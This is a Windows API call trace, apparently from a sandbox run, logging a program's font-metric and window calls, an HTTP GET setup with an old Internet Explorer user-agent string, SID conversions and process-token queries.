[0170.020] GetSystemMetrics (nIndex=6) returned 1
[0170.020] GetDC (hWnd=0x0) returned 0x1501085f
[0170.020] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af09c | out: lptm=0x1af09c) returned 1
[0170.020] SelectObject (hdc=0x1501085f, h=0x290a084c) returned 0x18a002e
[0170.020] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af0d4 | out: lptm=0x1af0d4) returned 1
[0170.020] SelectObject (hdc=0x1501085f, h=0x18a002e) returned 0x290a084c
[0170.020] ReleaseDC (hWnd=0x0, hDC=0x1501085f) returned 1
[0170.020] GetSystemMetrics (nIndex=6) returned 1
[0170.020] GetDC (hWnd=0x0) returned 0x1501085f
[0170.021] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af384 | out: lptm=0x1af384) returned 1
[0170.021] SelectObject (hdc=0x1501085f, h=0x290a084c) returned 0x18a002e
[0170.021] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af3bc | out: lptm=0x1af3bc) returned 1
[0170.021] SelectObject (hdc=0x1501085f, h=0x18a002e) returned 0x290a084c
[0170.021] ReleaseDC (hWnd=0x0, hDC=0x1501085f) returned 1
[0170.021] GetSystemMetrics (nIndex=6) returned 1
[0170.021] GetDC (hWnd=0x0) returned 0x1501085f
[0170.021] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af384 | out: lptm=0x1af384) returned 1
[0170.021] SelectObject (hdc=0x1501085f, h=0x290a084c) returned 0x18a002e
[0170.021] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af3bc | out: lptm=0x1af3bc) returned 1
[0170.021] SelectObject (hdc=0x1501085f, h=0x18a002e) returned 0x290a084c
[0170.021] ReleaseDC (hWnd=0x0, hDC=0x1501085f) returned 1
[0170.021] GetSystemMetrics (nIndex=6) returned 1
[0170.022] GetDC (hWnd=0x0) returned 0x1501085f
[0170.022] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af398 | out: lptm=0x1af398) returned 1
[0170.022] SelectObject (hdc=0x1501085f, h=0x290a084c) returned 0x18a002e
[0170.022] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af3d0 | out: lptm=0x1af3d0) returned 1
[0170.022] SelectObject (hdc=0x1501085f, h=0x18a002e) returned 0x290a084c
[0170.022] ReleaseDC (hWnd=0x0, hDC=0x1501085f) returned 1
[0170.022] GetSystemMetrics (nIndex=6) returned 1
[0170.022] GetDC (hWnd=0x0) returned 0x1501085f
[0170.022] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af09c | out: lptm=0x1af09c) returned 1
[0170.022] SelectObject (hdc=0x1501085f, h=0x290a084c) returned 0x18a002e
[0170.022] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af0d4 | out: lptm=0x1af0d4) returned 1
[0170.022] SelectObject (hdc=0x1501085f, h=0x18a002e) returned 0x290a084c
[0170.022] ReleaseDC (hWnd=0x0, hDC=0x1501085f) returned 1
[0170.022] GetSystemMetrics (nIndex=6) returned 1
[0170.023] GetDC (hWnd=0x0) returned 0x1501085f
[0170.023] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af398 | out: lptm=0x1af398) returned 1
[0170.023] SelectObject (hdc=0x1501085f, h=0x290a084c) returned 0x18a002e
[0170.023] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af3d0 | out: lptm=0x1af3d0) returned 1
[0170.023] SelectObject (hdc=0x1501085f, h=0x18a002e) returned 0x290a084c
[0170.023] ReleaseDC (hWnd=0x0, hDC=0x1501085f) returned 1
[0170.023] GetSystemMetrics (nIndex=6) returned 1
[0170.023] GetDC (hWnd=0x0) returned 0x1501085f
[0170.023] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af09c | out: lptm=0x1af09c) returned 1
[0170.023] SelectObject (hdc=0x1501085f, h=0x290a084c) returned 0x18a002e
[0170.023] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af0d4 | out: lptm=0x1af0d4) returned 1
[0170.023] SelectObject (hdc=0x1501085f, h=0x18a002e) returned 0x290a084c
[0170.023] ReleaseDC (hWnd=0x0, hDC=0x1501085f) returned 1
[0170.023] GetSystemMetrics (nIndex=6) returned 1
[0170.023] GetDC (hWnd=0x0) returned 0x1501085f
[0170.023] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af398 | out: lptm=0x1af398) returned 1
[0170.023] SelectObject (hdc=0x1501085f, h=0x290a084c) returned 0x18a002e
[0170.024] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af3d0 | out: lptm=0x1af3d0) returned 1
[0170.024] SelectObject (hdc=0x1501085f, h=0x18a002e) returned 0x290a084c
[0170.024] ReleaseDC (hWnd=0x0, hDC=0x1501085f) returned 1
[0170.024] GetSystemMetrics (nIndex=6) returned 1
[0170.024] GetDC (hWnd=0x0) returned 0x1501085f
[0170.024] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af09c | out: lptm=0x1af09c) returned 1
[0170.024] SelectObject (hdc=0x1501085f, h=0x290a084c) returned 0x18a002e
[0170.024] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af0d4 | out: lptm=0x1af0d4) returned 1
[0170.024] SelectObject (hdc=0x1501085f, h=0x18a002e) returned 0x290a084c
[0170.024] ReleaseDC (hWnd=0x0, hDC=0x1501085f) returned 1
[0170.024] GetSystemMetrics (nIndex=6) returned 1
[0170.024] GetDC (hWnd=0x0) returned 0x1501085f
[0170.024] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af398 | out: lptm=0x1af398) returned 1
[0170.024] SelectObject (hdc=0x1501085f, h=0x290a084c) returned 0x18a002e
[0170.024] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af3d0 | out: lptm=0x1af3d0) returned 1
[0170.024] SelectObject (hdc=0x1501085f, h=0x18a002e) returned 0x290a084c
[0170.024] ReleaseDC (hWnd=0x0, hDC=0x1501085f) returned 1
[0170.024] GetSystemMetrics (nIndex=6) returned 1
[0170.025] GetDC (hWnd=0x0) returned 0x1501085f
[0170.025] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af09c | out: lptm=0x1af09c) returned 1
[0170.025] SelectObject (hdc=0x1501085f, h=0x290a084c) returned 0x18a002e
[0170.025] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af0d4 | out: lptm=0x1af0d4) returned 1
[0170.025] SelectObject (hdc=0x1501085f, h=0x18a002e) returned 0x290a084c
[0170.025] ReleaseDC (hWnd=0x0, hDC=0x1501085f) returned 1
[0170.025] GetSystemMetrics (nIndex=6) returned 1
[0170.025] GetDC (hWnd=0x0) returned 0x1501085f
[0170.025] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af384 | out: lptm=0x1af384) returned 1
[0170.025] SelectObject (hdc=0x1501085f, h=0x290a084c) returned 0x18a002e
[0170.025] GetTextMetricsA (in: hdc=0x1501085f, lptm=0x1af3bc | out: lptm=0x1af3bc) returned 1
[0170.025] SelectObject (hdc=0x1501085f, h=0x18a002e) returned 0x290a084c
[0170.025] ReleaseDC (hWnd=0x0, hDC=0x1501085f) returned 1
[0170.025] GetSystemMetrics (nIndex=6) returned 1
[0170.027] SysReAllocStringLen (in: pbstr=0x295f388*=0x0, psz="GET", len=0x3 | out: pbstr=0x295f388*="GET") returned 1
[0170.028] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0170.028] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0170.028] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0170.028] SysReAllocStringLen (in: pbstr=0x295f388*="GET", psz="GET", len=0x3 | out: pbstr=0x295f388*="GET") returned 1
[0170.028] SysReAllocStringLen (in: pbstr=0x295f3b8*=0x0, psz="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)", len=0x39 | out: pbstr=0x295f3b8*="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)") returned 1
[0170.028] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x6, lpBuffer=0x1af420, lpdwBufferLength=0x1af424 | out: lpBuffer=0x1af420, lpdwBufferLength=0x1af424) returned 1
[0170.107] InternetSetOptionW (hInternet=0x0, dwOption=0x6, lpBuffer=0x1af420, dwBufferLength=0x4) returned 1
[0170.107] VirtualFree (lpAddress=0x2960000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0170.107] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x2956490, cbMultiByte=3, lpWideCharStr=0x1ae358, cchWideChar=2047 | out: lpWideCharStr="GET") returned 3
[0170.107] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0170.107] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0170.107] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0170.107] SysReAllocStringLen (in: pbstr=0x295f388*="GET", psz="GET", len=0x3 | out: pbstr=0x295f388*="GET") returned 1
[0170.108] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0170.108] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0170.108] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0170.108] SysReAllocStringLen (in: pbstr=0x295f388*="GET", psz="GET", len=0x3 | out: pbstr=0x295f388*="GET") returned 1
[0170.109] FlatSB_SetScrollProp (param_1=0x90140, index=0x200, newValue=0x0, param_4=1) returned 0
[0170.109] GetSysColor (nIndex=20) returned 0xffffff
[0170.109] FlatSB_SetScrollProp (param_1=0x90140, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0170.109] FlatSB_SetScrollInfo (param_1=0x90140, code=0, psi=0x1ae28e, fRedraw=1)
[0170.109] CallWindowProcA (lpPrevWndFunc=0x2837038, hWnd=0x90140, Msg=0x46, wParam=0x0, lParam=0x1ae18c) returned 0x0
[0170.114] GetTextExtentPoint32A (in: hdc=0x1501085f, lpString="0", c=1, psizl=0x1af514 | out: psizl=0x1af514) returned 1
[0170.114] IsIconic (hWnd=0x90140) returned 0
[0170.114] GetClientRect (in: hWnd=0x90140, lpRect=0x1af514 | out: lpRect=0x1af514) returned 1
[0170.114] GetWindowLongA (hWnd=0x90140, nIndex=-16) returned 116326400
[0170.114] GetWindowLongA (hWnd=0x90140, nIndex=-16) returned 116326400
[0170.114] IsIconic (hWnd=0x90140) returned 0
[0170.114] GetClientRect (in: hWnd=0x90140, lpRect=0x1af45c | out: lpRect=0x1af45c) returned 1
[0170.114] GetWindowLongA (hWnd=0x90140, nIndex=-16) returned 116326400
[0170.114] GetWindowLongA (hWnd=0x90140, nIndex=-16) returned 116326400
[0170.114] IsIconic (hWnd=0x90140) returned 0
[0170.114] GetClientRect (in: hWnd=0x90140, lpRect=0x1af42c | out: lpRect=0x1af42c) returned 1
[0170.114] GetWindowLongA (hWnd=0x90140, nIndex=-16) returned 116326400
[0170.114] GetWindowLongA (hWnd=0x90140, nIndex=-16) returned 116326400
[0170.114] IsIconic (hWnd=0x90140) returned 0
[0170.114] GetClientRect (in: hWnd=0x90140, lpRect=0x1af42c | out: lpRect=0x1af42c) returned 1
[0170.114] FlatSB_SetScrollProp (param_1=0x90140, index=0x200, newValue=0x0, param_4=0) returned 0
[0170.114] GetSysColor (nIndex=20) returned 0xffffff
[0170.114] FlatSB_SetScrollProp (param_1=0x90140, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0170.114] FlatSB_SetScrollInfo (param_1=0x90140, code=0, psi=0x1af46a, fRedraw=1) returned 0
[0170.115] GetWindowLongA (hWnd=0x90140, nIndex=-16) returned 116326400
[0170.115] IsIconic (hWnd=0x90140) returned 0
[0170.115] GetClientRect (in: hWnd=0x90140, lpRect=0x1af42c | out: lpRect=0x1af42c) returned 1
[0170.115] GetWindowLongA (hWnd=0x90140, nIndex=-16) returned 116326400
[0170.115] IsIconic (hWnd=0x90140) returned 0
[0170.115] GetClientRect (in: hWnd=0x90140, lpRect=0x1af42c | out: lpRect=0x1af42c) returned 1
[0170.115] GetWindowLongA (hWnd=0x90140, nIndex=-16) returned 116326400
[0170.115] IsIconic (hWnd=0x90140) returned 0
[0170.115] GetClientRect (in: hWnd=0x90140, lpRect=0x1af42c | out: lpRect=0x1af42c) returned 1
[0170.115] FlatSB_SetScrollProp (param_1=0x90140, index=0x100, newValue=0x0, param_4=0) returned 0
[0170.115] GetSysColor (nIndex=20) returned 0xffffff
[0170.115] FlatSB_SetScrollProp (param_1=0x90140, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0170.115] FlatSB_SetScrollInfo (param_1=0x90140, code=1, psi=0x1af46a, fRedraw=1) returned 0
[0170.115] GetWindowLongA (hWnd=0x90140, nIndex=-16) returned 116326400
[0170.115] IsIconic (hWnd=0x90140) returned 0
[0170.115] GetClientRect (in: hWnd=0x90140, lpRect=0x1af42c | out: lpRect=0x1af42c) returned 1
[0170.115] GetWindowLongA (hWnd=0x90140, nIndex=-16) returned 116326400
[0170.115] GetWindowLongA (hWnd=0x90140, nIndex=-16) returned 116326400
[0170.115] IsIconic (hWnd=0x90140) returned 0
[0170.115] GetClientRect (in: hWnd=0x90140, lpRect=0x1af45c | out: lpRect=0x1af45c) returned 1
[0170.115] GetWindowLongA (hWnd=0x90140, nIndex=-16) returned 116326400
[0170.116] GetWindowLongA (hWnd=0x90140, nIndex=-16) returned 116326400
[0170.116] IsIconic (hWnd=0x90140) returned 0
[0170.116] GetClientRect (in: hWnd=0x90140, lpRect=0x1af42c | out: lpRect=0x1af42c) returned 1
[0170.116] GetWindowLongA (hWnd=0x90140, nIndex=-16) returned 116326400
[0170.116] GetWindowLongA (hWnd=0x90140, nIndex=-16) returned 116326400
[0170.116] IsIconic (hWnd=0x90140) returned 0
[0170.116] GetClientRect (in: hWnd=0x90140, lpRect=0x1af42c | out: lpRect=0x1af42c) returned 1
[0170.116] FlatSB_SetScrollProp (param_1=0x90140, index=0x200, newValue=0x0, param_4=0) returned 0
[0170.116] GetSysColor (nIndex=20) returned 0xffffff
[0170.116] FlatSB_SetScrollProp (param_1=0x90140, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0170.116] FlatSB_SetScrollInfo (param_1=0x90140, code=0, psi=0x1af46a, fRedraw=1) returned 0
[0170.116] GetWindowLongA (hWnd=0x90140, nIndex=-16) returned 116326400
[0170.116] IsIconic (hWnd=0x90140) returned 0
[0170.116] GetClientRect (in: hWnd=0x90140, lpRect=0x1af42c | out: lpRect=0x1af42c) returned 1
[0170.116] GetWindowLongA (hWnd=0x90140, nIndex=-16) returned 116326400
[0170.116] IsIconic (hWnd=0x90140) returned 0
[0170.116] GetClientRect (in: hWnd=0x90140, lpRect=0x1af42c | out: lpRect=0x1af42c) returned 1
[0170.116] GetWindowLongA (hWnd=0x90140, nIndex=-16) returned 116326400
[0170.116] IsIconic (hWnd=0x90140) returned 0
[0170.116] GetClientRect (in: hWnd=0x90140, lpRect=0x1af42c | out: lpRect=0x1af42c) returned 1
[0170.116] FlatSB_SetScrollProp (param_1=0x90140, index=0x100, newValue=0x0, param_4=0) returned 0
[0170.116] GetSysColor (nIndex=20) returned 0xffffff
[0170.116] FlatSB_SetScrollProp (param_1=0x90140, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0170.116] FlatSB_SetScrollInfo (param_1=0x90140, code=1, psi=0x1af46a, fRedraw=1) returned 0
[0170.116] GetWindowLongA (hWnd=0x90140, nIndex=-16) returned 116326400
[0170.116] IsIconic (hWnd=0x90140) returned 0
[0170.116] GetClientRect (in: hWnd=0x90140, lpRect=0x1af42c | out: lpRect=0x1af42c) returned 1
[0170.117] GetCurrentThreadId () returned 0x84c
[0170.117] ConvertSidToStringSidA () returned 0x1
[0170.117] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0170.117] GetProcAddress (hModule=0x75370000, lpProcName="LocalFree") returned 0x753bca64
[0170.117] LocalFree (hMem=0x2e6f40) returned 0x0
[0170.117] LocalFree (hMem=0x2d2f90) returned 0x0
[0170.117] ConvertStringSidToSidA () returned 0x1
[0170.117] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2952914, pSourceSid=0x2d2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2952914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0170.117] IsValidSid (pSid=0x2952914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0170.117] ConvertSidToStringSidA () returned 0x1
[0170.117] LocalFree (hMem=0x2e6f40) returned 0x0
[0170.117] LocalFree (hMem=0x2d2f90) returned 0x0
[0170.117] ConvertStringSidToSidA () returned 0x1
[0170.117] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295702c, pSourceSid=0x2d2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x295702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0170.117] IsValidSid (pSid=0x295702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0170.117] ConvertSidToStringSidA () returned 0x1
[0170.117] LocalFree (hMem=0x2e6f40) returned 0x0
[0170.117] LocalFree (hMem=0x2d2f90) returned 0x0
[0170.117] ConvertStringSidToSidA () returned 0x1
[0170.117] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295f5a0, pSourceSid=0x2d2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x295f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0170.118] IsValidSid (pSid=0x295f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0170.118] ConvertSidToStringSidA () returned 0x1
[0170.118] LocalFree (hMem=0x2e6f40) returned 0x0
[0170.118] LocalFree (hMem=0x2d2f90) returned 0x0
[0170.118] ConvertStringSidToSidA () returned 0x1
[0170.118] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295f614, pSourceSid=0x2e6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0170.118] IsValidSid (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0170.118] ConvertSidToStringSidA () returned 0x1
[0170.118] LocalFree (hMem=0x2e6f58) returned 0x0
[0170.118] LocalFree (hMem=0x2e6f40) returned 0x0
[0170.118] ConvertStringSidToSidA () returned 0x1
[0170.118] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295f688, pSourceSid=0x2e6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe) | out: pDestinationSid=0x295f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0170.118] IsValidSid (pSid=0x295f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0170.118] ConvertSidToStringSidA () returned 0x1
[0170.118] LocalFree (hMem=0x2e6f58) returned 0x0
[0170.118] LocalFree (hMem=0x2e6f40) returned 0x0
[0170.118] ConvertStringSidToSidA () returned 0x1
[0170.118] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295f6fc, pSourceSid=0x2e6f58*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0) | out: pDestinationSid=0x295f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0170.118] IsValidSid (pSid=0x295f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0170.118] ConvertSidToStringSidA () returned 0x1
[0170.118] LocalFree (hMem=0x2dc1c8) returned 0x0
[0170.118] LocalFree (hMem=0x2e6f58) returned 0x0
[0170.118] ConvertStringSidToSidA () returned 0x1
[0170.118] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295f770, pSourceSid=0x2e6f70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0) | out: pDestinationSid=0x295f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0170.118] IsValidSid (pSid=0x295f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0170.118] ConvertSidToStringSidA () returned 0x1
[0170.118] LocalFree (hMem=0x2dc1c8) returned 0x0
[0170.118] LocalFree (hMem=0x2e6f70) returned 0x0
[0170.118] ConvertStringSidToSidA () returned 0x1
[0170.118] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295f7f8, pSourceSid=0x2e6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0) | out: pDestinationSid=0x295f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0170.118] IsValidSid (pSid=0x295f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0170.118] ConvertSidToStringSidA () returned 0x1
[0170.118] LocalFree (hMem=0x2dc1c8) returned 0x0
[0170.119] LocalFree (hMem=0x2e6f40) returned 0x0
[0170.119] ConvertStringSidToSidA () returned 0x1
[0170.119] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295f880, pSourceSid=0x2e6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14) | out: pDestinationSid=0x295f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0170.119] IsValidSid (pSid=0x295f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0170.119] ConvertSidToStringSidA () returned 0x1
[0170.119] LocalFree (hMem=0x2e6f58) returned 0x0
[0170.119] LocalFree (hMem=0x2e6f40) returned 0x0
[0170.119] ConvertStringSidToSidA () returned 0x1
[0170.119] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295f90c, pSourceSid=0x2e6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13) | out: pDestinationSid=0x295f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0170.119] IsValidSid (pSid=0x295f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0170.119] ConvertSidToStringSidA () returned 0x1
[0170.119] LocalFree (hMem=0x2e6f58) returned 0x0
[0170.119] LocalFree (hMem=0x2e6f40) returned 0x0
[0170.119] ConvertStringSidToSidA () returned 0x1
[0170.119] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295f998, pSourceSid=0x2e6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa) | out: pDestinationSid=0x295f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0170.119] IsValidSid (pSid=0x295f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0170.119] ConvertSidToStringSidA () returned 0x1
[0170.119] LocalFree (hMem=0x2e6f58) returned 0x0
[0170.119] LocalFree (hMem=0x2e6f40) returned 0x0
[0170.119] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0170.119] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentThread") returned 0x753c3351
[0170.119] GetCurrentThread () returned 0xfffffffe
[0170.120] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.120] GetProcAddress (hModule=0x76da0000, lpProcName="OpenThreadToken") returned 0x76db432c
[0170.120] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0xf01ff, OpenAsSelf=1, TokenHandle=0x1aecec | out: TokenHandle=0x1aecec*=0x2833756) returned 0
[0170.120] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0170.120] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentProcess") returned 0x753bcdcf
[0170.120] GetCurrentProcess () returned 0xffffffff
[0170.120] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.120] GetProcAddress (hModule=0x76da0000, lpProcName="OpenProcessToken") returned 0x76db4304
[0170.120] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0xf01ff, TokenHandle=0x295fa3c | out: TokenHandle=0x295fa3c*=0x1d0) returned 1
[0170.121] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.121] GetProcAddress (hModule=0x76da0000, lpProcName="MapGenericMask") returned 0x76dc7a73
[0170.121] MapGenericMask (in: AccessMask=0x1aeb64, GenericMapping=0x1aeb68 | out: AccessMask=0x1aeb64)
[0170.121] MapGenericMask (in: AccessMask=0x1aec98, GenericMapping=0x1aec9c | out: AccessMask=0x1aec98)
[0170.121] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.121] GetProcAddress (hModule=0x76da0000, lpProcName="GetTokenInformation") returned 0x76db431c
[0170.121] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1aecac | out: TokenInformation=0x0, ReturnLength=0x1aecac) returned 0
[0170.121] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
